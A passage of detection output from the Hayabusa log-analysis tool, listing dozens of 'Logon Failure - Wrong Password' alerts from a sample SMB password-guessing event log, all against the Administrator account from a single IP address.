NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PvGB1dZrfDWyZoqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4oi8iL88rJo7g2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.676 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3OUnytXi4NjvqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WKkJcp3TYj31iJUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0E44RVqAE1feU0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny5LCb1qOIUhxOPY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9jcDgzzqH26DjQ1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yil94cFkU6UP24SK | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bkdVHF3vggCcuNdn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dRRI2CS3aVIX4nX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: chDZq3VgxIE2mRb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HLVvgMmqLXKZADON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i4avO2AJSlNb0IUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.128 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mdo5CvycGvGhn33y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: heJfjLl1vbX6lMjZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOP1E6hd4Jtj4gob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xa7kMCNz0bEGTBqX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSxTQ4HsZt2DeYVe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxHpSQwFSV4hveVM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n3OwzSPomxZLoCe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e9IfwDZIfYT6A50K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOf6DbRX4zlNqLdb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 00kXrnJNH40NyoYL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nsNHcb9pnpdRgeL7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.592 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucMhgxMXy9Ch1jNm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cfi3ZaLTECJgjM9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: usugjEEBHlhJvOyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQ1pM2CVLt5ITVD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NIboW7hNljF3HPpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rOk5W4rkSYRRw4xS | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJTfcwd8rnFc06iF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6sm415W5zkvjdnTV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KEiSbtlmW4ou1mc7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xWeZV5pHt94adwUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5np7HeCPAFTDdTXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:47.088 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gXbe2jEJVtwaQXlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hZFiUCJnaBdHcw4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a71wyo41KV1ZoT7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogB17WdeOiC19rqn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ANOLPWG12lkW39Ei | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y1vf7OUxb6TH3Q4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxU5yumSieUzSgzH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9K5EoWWASU8SlSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PwZLRPFxaFWwjZEe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8fXgFFb3HTMunsoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R1RozAr1uhux4cYW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7EmuUSv03RnhKsF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jw410HEW8EC3MC9f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTYp8cEbt3Yggo3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWJVzgYLWIo7SGCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DP13jPdW5Gdl8z56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LNXOWjHmMDhfFVon | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kka1RiF3f7Nhkf8x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2o90lG6attzWU4ZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PyPK9kuJdflQ4RKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a9I3El7d7anR0kIz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDUMTEfNhFuuqMle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e0F70d1WstkqnQgA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bm0txApQSp1U42N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JeEe5ENSIZnfc3FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oasE54Z1FlpswY0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bhje1BgvxOlG28JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9iTIv4UQ4En9RA2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mg8KFm1lCeImj8Sb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h17Fz1s6GJki61jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Pjjn4FAkJn4h32r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARVx3FAAww8Gmfvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sYIwPg5k1wpvWobN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0sfhYQ54SjC4JTX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nfZYnUPV40FShcqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XYbvWVCT0tFixZTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XC6Vmz0ql8myDuGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJ8JvuvZZzwSOzFo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s06yKaogI6FYkXla | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
